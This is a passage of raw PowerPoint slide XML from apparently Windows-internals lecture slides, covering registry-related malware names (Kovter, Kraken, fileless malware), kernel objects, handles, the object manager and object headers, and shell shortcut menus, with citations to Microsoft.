              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6371164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err="1" smtClean="0"/>
              <a:t>Kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Kraken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" baseline="-25000"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60</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7143875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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a data structure that represents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>system resource, such as </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>file, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>graphic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>image. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>application can't directly access object data, nor the system resource that an object represents. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, your application must obtain an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>object handle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which it can use to examine or modify the system resource. </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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1469732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5" y="2675467"/>
            <a:ext cx="8208912" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>handle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> has an entry in an internally maintained table. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Those </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>entries contain the addresses of the resources, and the means to identify the resource type.</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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Handle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3258452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3" y="2675467"/>
            <a:ext cx="8280920" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>An object consists of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>a standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>object-specific attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>all objects have the same structure, there is a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>in Windows that maintains all objects.</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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12165760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object header includes items such as the object name, so that other processes can reference the object by name, and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>security descriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, so that the object manager can control which processes access the system resource.</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64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20611759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Creating objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Verifying that a process has the right to use the object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Creating object handles and returning them to the caller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Maintaining resource quotas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Creating duplicate handles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Closing handles to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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65</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Tasks That </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Object Performs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1292697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gn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>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AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9118455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Because shortcut menus are often used for file management, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> provides a set of default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>s, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, that appear on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shortcut menu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>file system object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> such as a file or a folder.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shortcut Menus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE96A04-6FFE-4647-B1EB-FABF2537EC88}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36385361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788025" y="2564904"/>
            <a:ext cx="4032448" cy="3849877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>left </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example illustrates a default shortcut menu that displayed by right-clicking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyFile.xyz-ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The reason that a default shortcut menu appears for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MyFile.xyz-ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is due to the fact that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xyz-</a:t>
            </a:r>
            <a:r>
